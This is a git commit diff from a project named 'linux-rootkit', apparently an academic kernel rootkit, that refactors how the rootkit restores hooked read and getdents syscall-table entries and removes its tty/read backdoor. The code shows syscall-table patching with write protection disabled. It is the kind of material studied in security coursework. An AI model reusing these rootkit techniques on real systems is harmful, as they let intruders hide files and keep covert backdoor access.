linux-rootkit

commit 6d2237b91f812b8249786716f51fa8009333a5f9
parent cfcc31b052f021f6361b5f31215c3137305ff5bf
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 28 Nov 2020 12:00:05 +0100

refactors code

Diffstat:
M
src/backdoor.c
 | 
9
++++++++-
M
src/backdoor.h
 | 
2
+-
M
src/channel.c
 | 
2
+-
M
src/filehide.c
 | 
17
+++++++++++++----
M
src/hook.c
 | 
27
++++-----------------------
M
src/hook.h
 | 
4
++++

6 files changed, 31 insertions(+), 30 deletions(-)
diff --git a/src/backdoor.c b/src/backdoor.c
@@ -36,7 +36,7 @@ backdoor_tty(void)
 }
 
 void
-disable_backdoor(void)
+unbackdoor(void)
 {
     if (tty) {
         if (current_receive_buf2) {
@@ -49,6 +49,13 @@ disable_backdoor(void)
 
         tty = NULL;
     }
+
+    if (sys_read) {
+        while (atomic_read(&read_count) > 0);
+        disable_protection();
+        sys_calls[__NR_read] = (void *)sys_read;
+        enable_protection();
+    }
 }
 
 
diff --git a/src/backdoor.h b/src/backdoor.h
@@ -5,7 +5,7 @@
 
 void backdoor_read(void);
 void backdoor_tty(void);
-void disable_backdoor(void);
+void unbackdoor(void);
 
 // hooks
 void g7_receive_buf(struct tty_struct *, const unsigned char *, char *, int);
diff --git a/src/channel.c b/src/channel.c
@@ -109,7 +109,7 @@ handle_togglebd(unsigned long arg)
     long sarg = (long)arg;
 
     if (!sarg) {
-        disable_backdoor();
+        unbackdoor();
         rootkit.backdoor = BD_OFF;
         msg = "off";
     } else if (sarg < 0) {
diff --git a/src/filehide.c b/src/filehide.c
@@ -23,10 +23,19 @@ hide_files(void)
 void
 unhide_files(void)
 {
-    disable_protection();
-    sys_calls[__NR_getdents] = (void *)sys_getdents;
-    sys_calls[__NR_getdents64] = (void *)sys_getdents64;
-    enable_protection();
+    if (sys_getdents) {
+        disable_protection();
+        while (atomic_read(&getdents_count) > 0);
+        sys_calls[__NR_getdents] = (void *)sys_getdents;
+        enable_protection();
+    }
+
+    if (sys_getdents64) {
+        disable_protection();
+        while (atomic_read(&getdents64_count) > 0);
+        sys_calls[__NR_getdents64] = (void *)sys_getdents64;
+        enable_protection();
+    }
 }
 
 
diff --git a/src/hook.c b/src/hook.c
@@ -61,26 +61,11 @@ init_hooks(void)
 void
 remove_hooks(void)
 {
-    if (rootkit.hiding_files) {
-        while (atomic_read(&getdents_count) > 0);
-        disable_protection();
-        sys_calls[__NR_getdents] = (void *)sys_getdents;
-        enable_protection();
-
-        while (atomic_read(&getdents64_count) > 0);
-        disable_protection();
-        sys_calls[__NR_getdents64] = (void *)sys_getdents64;
-        enable_protection();
-    }
+    if (rootkit.hiding_files)
+        unhide_files();
 
-    if (rootkit.backdoor == BD_READ) {
-        while (atomic_read(&read_count) > 0);
-        disable_protection();
-        sys_calls[__NR_read] = (void *)sys_read;
-        enable_protection();
-    } else if (rootkit.backdoor == BD_TTY) {
-        disable_backdoor();
-    }
+    if (rootkit.backdoor != BD_OFF)
+        unbackdoor();
 }
 
 void
@@ -99,10 +84,6 @@ enable_protection(void)
 asmlinkage ssize_t
 g7_read(const struct pt_regs *pt_regs)
 {
-    /* unsigned fd = (unsigned)pt_regs->di; */
-    /* char *buf = (char *)pt_regs->si; */
-    /* size_t count = (size_t)pt_regs->dx; */
-
     return sys_read(pt_regs);
 }
 
diff --git a/src/hook.h b/src/hook.h
@@ -13,6 +13,10 @@ typedef struct {
     void *orig;
 } sc_hook_t;
 
+extern atomic_t read_count;
+extern atomic_t getdents_count;
+extern atomic_t getdents64_count;
+
 extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
 extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
 extern asmlinkage long (*sys_getdents64)(const struct pt_regs *);